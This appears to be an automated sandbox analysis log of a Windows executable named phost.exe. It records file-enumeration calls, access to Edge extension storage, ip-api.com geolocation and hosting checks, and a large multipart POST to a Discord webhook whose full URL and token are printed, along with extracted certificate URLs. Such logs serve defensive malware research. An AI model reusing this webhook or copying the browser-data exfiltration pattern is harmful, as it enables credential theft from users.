              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: phost.exe, 00000001.00000002.2185223962.00007FFE10241000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: phost.exe, phost.exe, 00000001.00000002.2182012279.00007FFDFAAE5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000069.00000000.2046278309.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: phost.exe, 00000001.00000002.2184701934.00007FFE0EB31000.00000040.00000001.01000000.00000010.sdmp
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC792F0 FindFirstFileExW,FindClose,0_2_00007FF62CC792F0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC783B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF62CC783B0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC918E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF62CC918E4
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC792F0 FindFirstFileExW,FindClose,1_2_00007FF62CC792F0
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC918E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF62CC918E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,105_2_00007FF6BBCD46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCCE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,105_2_00007FF6BBCCE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD188E0 FindFirstFileExA,105_2_00007FF6BBD188E0
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: blank-c9yfy.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 759276User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=d86edcfe5e1bf83a434b434f5a1b347a
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 07:42:31 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734075752x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bba3f1%2FZudwJQkFnKMdEqfZPnm6iBU18h3o3V9HzDakAlD5TEPANc%2BJkkp4mRZbicFS%2BglfWhSxd5p311G2JhLOYuxaDo7M3Dq5SOiR%2BQaH2o1Dt9emz1wTDcHLh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=d7c98e932c69185b4fd952897188f4a54139cb30-1734075751; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=E0fT_eR75aZoCbniOOZ.Jl5rOKtvPVKzo2aCeNNnf0A-1734075751127-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f14515d1ed40cb2-EWR
              Source: phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677087289.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000002.2191688030.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677087289.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000002.2191688030.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: phost.exe, 00000001.00000003.1842261128.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1854068522.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1849010645.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1813520345.000001AE1D7ED000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2170059092.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178616618.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1886265486.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2173409124.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1843830271.000001AE1D7D5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2172415408.000001AE1D7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: powershell.exe, 0000004A.00000002.2037939730.000001C72DC70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: svchost.exe, 00000014.00000002.2946070678.000001E22DA00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677087289.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000002.2191688030.000001C32AC8D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678323693.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1679137996.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: phost.exe, 00000001.00000003.1701513638.000001AE1D222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D8FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D9B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: phost.exe, 00000001.00000002.2177248707.000001AE1D1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: phost.exe, 00000001.00000002.2178106775.000001AE1D668000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D668000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D668000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D668000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837339893.000001AE1D668000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704518164.000001AE1D674000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D668000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837339893.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1832092199.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1851038862.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704273079.000001AE1D718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: phost.exe, 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingrz
